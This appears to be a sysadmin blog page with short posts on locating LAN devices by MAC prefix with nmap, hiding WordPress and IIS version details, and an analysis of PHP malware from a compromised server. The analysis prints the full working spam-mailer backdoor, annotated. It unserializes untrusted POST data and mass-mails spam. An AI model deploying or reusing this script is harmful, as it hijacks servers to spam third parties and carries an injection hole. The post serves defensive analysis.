How to find network device using it’s manufacturer name?

I’ve previously posted a note about finding Raspberry Pi without knowing it’s ip address. Well, basically it’s the same… Only you need to change MAC prefix to find other manufacturer. To wrap this is up, this is a command to find device by MAC prefix:

sudo nmap -sP 192.168.100.0/24 | awk '/^Nmap/{ip=$NF}/00:D0:23/{print ip}'

And here you can find actual MAC information (use CTRL+F).

Of course you need Nmap to do that! And sudo is necessary!

Beware that sometimes there might be many prefixes for one manufacturer. Also check company name precisely, for example HP is Hewlett Packard but it also can be ProCurve Networking by HP.

How to obscure your WordPress version and troll the attacker a little…

One of my company’s WordPress installations has been hacked by Turkish hackers recently. After quick investigation I’ve found that script version was little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with readme file by default. I’ve found that malicious scripts or people use that to determine your version’s branch. So I’ve decided to Troll them a little bit… Continue reading How to obscure your WordPress version and troll the attacker a little…

How to remove unwanted HTTP Response Headers in IIS 7.5

Hiding server software is one of ways to protect your services from hackers. It’s quite easy to obscure IIS identity. In few steps I’ll show you how to accomplish this task on WIMP stack.

Continue reading How to remove unwanted HTTP Response Headers in IIS 7.5

PHP malicious code analysis no. 1

I found this piece of a PHP malware code on a compromised web server that I started to administer. It’s name was random character string eg. acbjxuu.php. There were about 20 more scripts of this kind. It’s rather very simple script for spaming purposes. For your understanding I’ve wrote what it’s doing in comments between code lines.

if (isset($_POST['task']))
{
	// be sure to display all PHP errors
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// disable default PHP memory limit
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);
 
	// get serialized array from POST var named task
	// example array structure: array(array('to'=>'[email protected]', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
 
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
 
 
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million of viagra & cialis related mails... 
	foreach ($x as $arr)
	{
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}

I’ll look in logs for IP addresses that tried to reach for this scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your webserver contents!